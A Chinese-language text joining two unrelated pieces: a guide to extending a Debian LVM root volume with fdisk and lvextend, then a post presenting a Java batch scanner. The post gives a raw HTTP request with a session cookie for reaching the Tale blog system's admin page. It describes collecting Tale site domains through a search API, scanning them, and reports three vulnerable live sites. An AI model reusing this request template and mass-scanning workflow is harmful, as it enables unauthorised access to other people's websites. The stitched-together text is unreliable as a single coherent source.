虚拟机先增加空间

fdisk /dev/sda 操作 /dev/sda 的分区表
p 查看已分区数量(我看到有两个 /dev/sda1 /dev/sda2)
n 新增加一个分区
p 分区类型我们选择为主分区
分区号选3(因为1,2已经用过了,见上)
回车 默认(起始扇区)
回车 默认(结束扇区)
t 修改分区类型
选分区3
8e 修改为LVM(8e就是LVM)
w 写分区表
q 完成,退出fdisk命令
重启
mkfs.ext3 /dev/sda3
三、添加新LVM到已有的LVM组,实现扩容
lvm 进入lvm管理
lvm> pvcreate /dev/sda3 这是初始化刚才的分区,必须的
lvm> vgextend debian-vg /dev/sda3 将初始化过的分区加入到虚拟卷组
lvm>lvextend -L +29.9G /dev/debian-vg/root 扩展已有卷的容量
lvm>pvdisplay 查看卷容量,这时你会看到一个很大的卷了
lvm>quit 退出
以上只是卷扩容了,下面是文件系统的真正扩容,输入以下命令:
resize2fs /dev/debian-vg/root
重启

花了一天的时间造的轮子,用Java写的

github地址ScanFramwork-Java

由三个大类组成,支持导出结果到文件/批量多线程扫描/自定义正则匹配结果/文本数据包直接解析发送(与burp拦截格式和sqlmap -r格式相同)
盲注类-p sleep和自动插入后门backdoor保留,暂未实现

用法:

这里使用上次挖出的Tale博客系统漏洞来测试,
设置post.txt为模板

GET /admin HTTP/1.1
Host: tale.biezhi.me
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://tale.biezhi.me/admin
Cookie: S_L_ID=3OCjFvU8Cps0UR
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

这里的Host程序会自动换成需要测的地址,其他的作为模板不变

通过某些方式(如百度api)获得一些使用tale搭建的网站域名,保存在targets.txt中

如果返回含有“/admin/profile”字符串则说明成功利用漏洞,这里设置-p “match:./admin/profile.“,match:表示匹配后面的正则表达式pattern。

设定输出为res.txt

执行命令:
java -jar .\ScanFramwork.jar -o res.txt -p "match:.*/admin/profile.*" -t targets.txt -r
post.txt

(en。。判断必要参数好像有点问题,不管了)

成功检测到了其中三个有此漏洞的系统。
输出结果在res.txt中